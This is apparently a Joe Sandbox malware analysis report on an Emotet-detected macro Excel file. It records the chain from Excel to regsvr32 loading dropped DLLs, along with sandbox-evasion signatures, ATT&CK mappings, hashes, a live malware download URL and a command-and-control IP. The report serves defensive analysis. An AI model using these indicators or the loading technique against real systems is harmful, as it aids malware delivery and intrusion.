                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2796Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2952Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2428Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2984Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1212Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1412Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 944Thread sleep time: -180000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1940Thread sleep time: -180000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1268Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 1.3 %
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-49888
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-49644
                        Source: regsvr32.exe, 0000000B.00000002.497300718.0000000000363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: regsvr32.exe, 0000000D.00000002.511010476.0000000000403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004802B VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,3_2_1004802B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002992A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002992A
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10059DC8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,3_2_10059DC8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029AA52 mov eax, dword ptr fs:[00000030h]4_2_0029AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099AA52 mov eax, dword ptr fs:[00000030h]5_2_0099AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058AA52 mov eax, dword ptr fs:[00000030h]6_2_0058AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DAA52 mov eax, dword ptr fs:[00000030h]8_2_001DAA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048AA52 mov eax, dword ptr fs:[00000030h]9_2_0048AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004763E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1004763E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048B58 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_10048B58
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10059655 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10059655
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100500F4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_100500F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10056C81 SetUnhandledExceptionFilter,__encode_pointer,3_2_10056C81
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10056CA3 __decode_pointer,SetUnhandledExceptionFilter,3_2_10056CA3

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 168.119.39.118 187
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc"
                        Source: Yara matchFile source: app.xml, type: SAMPLE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,3_2_100690A2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_10069138
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_100691AA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_1006937A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_1006745A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_10069465
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_100694CA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_10069506
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_10019571
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_100676DE
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,3_2_10069730
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,3_2_10059766
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: __crtGetLocaleInfoW_stat,3_2_1006986B
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_100698A6
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_100679A2
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: __crtGetLocaleInfoA_stat,3_2_100699E3
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10071CA2
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,3_2_10069CCE
                        Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10063CA7 cpuid 3_2_10063CA7
                        Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10056B81 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_10056B81
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1005C6D9 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_1005C6D9
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10048B58 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_10048B58

                        Stealing of Sensitive Information

                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000B79D __EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,3_2_1000B79D
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000A5B9 CreateBindCtx,CoTaskMemFree,3_2_1000A5B9
                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | 21 Scripting | Path Interception | 111 Process Injection | 1 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 12 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | 43 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 37 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | Scheduled Transfer | 123 Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
                        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 131 Masquerading | LSA Secrets | 21 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Modify Registry | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
                        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
                        [Behavior graph, ID: 581726. Sample: commenti_19265309.xlsm; Startdate: 02/03/2022; Architecture: WINDOWS; Score: 100. Process chain: EXCEL.EXE (contacts gymsportive.com, 212.64.200.154; drops C:\Users\user\sei.ocx, PE32) started regsvr32.exe, followed by a chain of nested regsvr32.exe processes, each with the signature "Hides that the sample has been downloaded from the Internet (zone.identifier)".]

                        Source | Detection | Scanner | Label
                        commenti_19265309.xlsm | 51% | ReversingLabs | Document-Word.Trojan.Emotet
                        No Antivirus matches
                        Source | Detection | Scanner | Label
                        13.2.regsvr32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        5.2.regsvr32.exe.980000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        12.2.regsvr32.exe.1c0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        4.2.regsvr32.exe.110000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        12.2.regsvr32.exe.230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        9.2.regsvr32.exe.470000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        15.2.regsvr32.exe.240000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        10.2.regsvr32.exe.920000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        9.2.regsvr32.exe.110000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        3.2.regsvr32.exe.460000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        6.2.regsvr32.exe.570000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        11.2.regsvr32.exe.420000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        7.2.regsvr32.exe.1f0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        4.2.regsvr32.exe.280000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        8.2.regsvr32.exe.150000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        11.2.regsvr32.exe.3f0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        15.2.regsvr32.exe.500000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        7.2.regsvr32.exe.3b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        14.2.regsvr32.exe.1b0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        10.2.regsvr32.exe.950000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        8.2.regsvr32.exe.1c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                        6.2.regsvr32.exe.310000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        14.2.regsvr32.exe.180000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        5.2.regsvr32.exe.5d0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        13.2.regsvr32.exe.180000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        3.2.regsvr32.exe.110000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                        Source | Detection | Scanner | Label
                        gymsportive.com | 6% | Virustotal |

                        Source | Detection | Scanner | Label
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
                        https://168.119.39.118/.N | 0% | Avira URL Cloud | safe
                        http://gymsportive.com/0zwe/pSiUh/ | 14% | Virustotal |
                        http://gymsportive.com/0zwe/pSiUh/ | 100% | Avira URL Cloud | malware
                        http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                        https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaT | 0% | Avira URL Cloud | safe
                        https://168.119.39.118/ | 0% | Avira URL Cloud | safe
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                        http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                        https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaTI | 0% | Avira URL Cloud | safe
                        http://ocsp.entrust.net0D | 0% | URL Reputation | safe
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        gymsportive.com | 212.64.200.154 | true | true |  | unknown

                        Name | Malicious | Antivirus Detection | Reputation
                        http://gymsportive.com/0zwe/pSiUh/ | true | 14%, Virustotal; Avira URL Cloud: malware | unknown
                        https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaT | true | Avira URL Cloud: safe | unknown
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 581726
Start date: 02.03.2022
Start time: 16:41:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 59s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: commenti_19265309.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@27/5@1/41
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 64.8% (good quality ratio 61.3%)
• Quality average: 76.4%
• Quality standard deviation: 27.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 76
• Number of non-executed functions: 240
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
16:41:31 | API Interceptor | 819x Sleep call for process: regsvr32.exe modified
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 1028096
Entropy (8bit): 6.289681754051936
Encrypted: false
SSDEEP: 12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQx5tFjNRLU:Ci6fgcIcHB8ZSbLU
MD5: EC43B8038071C5ED84EC556990F1858C
SHA1: CB8A7F5274987DAB12ECFB0DAA5699B1C145A513
SHA-256: 40C830C3E7DC753336FF2708DEEA882022608B8FEB571D732D07AFD1ED0A2C58
SHA-512: 608671479FCB4F32B62661EC0D7C8BC1238E6AA02448833E9D4C43AA1B9DFCD41B2F58DC309DE673BF16CCFAAD2FEABC3147CB64A30CB0AF8F059A5A54DD9E53
Malicious: true
IE Cache URL: http://gymsportive.com/0zwe/pSiUh/
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 2415 x 64, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 29560
Entropy (8bit): 7.903149132963418
Encrypted: false
SSDEEP: 768:lzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UW:JtT5fTR4Lh1NisFYBc3cr+UW
MD5: 5BAB80911CB5E910D18D366B360C7B4B
SHA1: D40007FEC139A200DE1A3B84774C81AD28321B63
SHA-256: E5191E67B0C6E3EA75AE1E6ED836B0124F21E16FD087B6C3475FD54E71B547D5
SHA-512: 46B338ECE9FDEB79EF3F5758F3433EB966D9149ED1C3F6BAAD48E76DB79DF24994294089D66B7AEE5BAC14366A4C7D3F98E17EBCBFBBA65B45B01EDD1597D2FC
Malicious: false
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
MD5: 797869BB881CFBCDAC2064F92B26E46F
SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious: true
                                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1028096
                                                                                                              Entropy (8bit):6.289681754051936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQx5tFjNRLU:Ci6fgcIcHB8ZSbLU
                                                                                                              MD5:EC43B8038071C5ED84EC556990F1858C
                                                                                                              SHA1:CB8A7F5274987DAB12ECFB0DAA5699B1C145A513
                                                                                                              SHA-256:40C830C3E7DC753336FF2708DEEA882022608B8FEB571D732D07AFD1ED0A2C58
                                                                                                              SHA-512:608671479FCB4F32B62661EC0D7C8BC1238E6AA02448833E9D4C43AA1B9DFCD41B2F58DC309DE673BF16CCFAAD2FEABC3147CB64A30CB0AF8F059A5A54DD9E53
                                                                                                              Malicious:true
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1028096
                                                                                                              Entropy (8bit):6.289681754051936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQx5tFjNRLU:Ci6fgcIcHB8ZSbLU
                                                                                                              MD5:EC43B8038071C5ED84EC556990F1858C
                                                                                                              SHA1:CB8A7F5274987DAB12ECFB0DAA5699B1C145A513
                                                                                                              SHA-256:40C830C3E7DC753336FF2708DEEA882022608B8FEB571D732D07AFD1ED0A2C58
                                                                                                              SHA-512:608671479FCB4F32B62661EC0D7C8BC1238E6AA02448833E9D4C43AA1B9DFCD41B2F58DC309DE673BF16CCFAAD2FEABC3147CB64A30CB0AF8F059A5A54DD9E53
                                                                                                              Malicious:false
                                                                                                              File type:Microsoft Excel 2007+
                                                                                                              Entropy (8bit):7.732822009162956
                                                                                                              TrID:
                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                              • ZIP compressed archive (8000/1) 8.08%
                                                                                                              File name:commenti_19265309.xlsm
                                                                                                              File size:47652
                                                                                                              MD5:ea31d45aabef92c32f90ec8d5ee3fc88
                                                                                                              SHA1:16d18be1150fdde8d16c2cae9f92de453ca7342c
                                                                                                              SHA256:e287a83571ac14de139663276caeea8ee7c53db3c2c6660f9520d43ac0eb9985
                                                                                                              SHA512:d0fcaceef6e2d33617fa626e4ad2dc5fd7188a25e96592fd4ce0678c3ec222d1f05847b85d04160151c0462ff6c7d8ef239ce6ab39dfe0e33ce7695c4e273c2f
                                                                                                              SSDEEP:768:wdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:WoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw
                                                                                                              Icon Hash:e4e2aa8aa4bcbcac
                                                                                                              Document Type:OpenXML
                                                                                                              Number of OLE Files:1
                                                                                                              Has Summary Info:
                                                                                                              Application Name:
                                                                                                              Encrypted Document:
                                                                                                              Contains Word Document Stream:
                                                                                                              Contains Workbook/Book Stream:
                                                                                                              Contains PowerPoint Document Stream:
                                                                                                              Contains Visio Document Stream:
                                                                                                              Contains ObjectPool Stream:
                                                                                                              Flash Objects Count:
                                                                                                              Contains VBA Macros:
                                                                                                              Name:Je1
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
Je1 3 False 0 False pre
16,3,=CHAR("101")
                                                                                                              Name:Je2
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
